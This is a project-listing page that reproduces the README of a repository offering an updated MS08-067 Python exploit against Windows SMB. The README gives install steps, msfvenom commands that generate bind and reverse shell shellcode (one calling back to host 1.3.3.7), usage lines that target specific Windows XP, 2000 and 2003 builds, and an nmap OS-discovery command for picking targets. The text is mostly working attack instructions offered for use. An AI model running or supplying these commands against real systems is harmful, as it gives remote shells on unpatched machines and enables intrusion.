Ms08 067 Save

Updating MS08-067 Python exploit script

Project README

MS08_067 Python Exploit Script - Updated 2018

This is an updated version of the super old MS08-067 Python exploit script. It implements some fixes to allow easy exploitation on a wider range of configurations.

Cloned and edited from this repository:
https://github.com/jivoi/pentest/

Installation on Kali

git clone https://github.com/andyacer/ms08_067/

You'll need to update Kali's Impacket version to 0_9_17

Here in 2018, Kali's package management is on an old version of Impacket. Here's the steps on how to fix it:

git clone --branch impacket_0_9_17 --single-branch https://github.com/CoreSecurity/impacket/
cd impacket
pip install .

Update Notes

+ Added support for selecting a target port at the command line.  It seemed that only 445 was previously supported.
+ Changed library calls to correctly establish a NetBIOS session for SMB transport
+ Changed shellcode handling to allow for variable length shellcode. Just cut and paste into this source file.

Generating Shellcode

Example msfvenom commands to generate shellcode. Just paste these into the file which you'll edit after downloading. 'Cause you're an awesome hacker like that.

msfvenom -p windows/shell_bind_tcp RHOST=192.168.1.1 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

msfvenom -p windows/shell_reverse_tcp LHOST=1.3.3.7 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

msfvenom -p windows/shell_reverse_tcp LHOST=1.3.3.7 LPORT=62000 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

Usage

Usage: ms08_067_2018.py <os #> <Port #>

ms08_067_2018.py 192.168.1.1 1 445 -- for Windows XP SP0/SP1 Universal, port 445
ms08_067_2018.py 192.168.1.1 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
ms08_067_2018.py 192.168.1.1 3 445 -- for Windows 2003 SP0 Universal
ms08_067_2018.py 192.168.1.1 4 445 -- for Windows 2003 SP1 English
ms08_067_2018.py 192.168.1.1 5 445 -- for Windows XP SP3 French (NX)
ms08_067_2018.py 192.168.1.1 6 445 -- for Windows XP SP3 English (NX)
ms08_067_2018.py 192.168.1.1 7 445 -- for Windows XP SP3 English (AlwaysOn NX)

Also: nmap has a good OS discovery script that pairs well with this exploit:
nmap -p 139,445 --script-args=unsafe=1 --script /usr/share/nmap/scripts/smb-os-discovery 192.168.1.1

Open Source Agenda is not affiliated with "Ms08 067" Project. README Source: andyacer/ms08_067

Stars

103

Open Issues

Last Commit

5 years ago

Repository

andyacer/ms08_067

License

MIT

Open Source Agenda Badge

<a href="https://www.opensourceagenda.com/projects/ms08-067"><img src="https://www.opensourceagenda.com/projects/ms08-067/reviews/badge.svg" alt="Open Source Agenda"></a>

Submit Review Review Your Favorite Project

Submit Resource Articles, Courses, Videos

Submit Article Submit a post to our blog

From the blog

Dec 11, 2022

How to Choose Which Programming Language to Learn First?

From the blog

Dec 11, 2022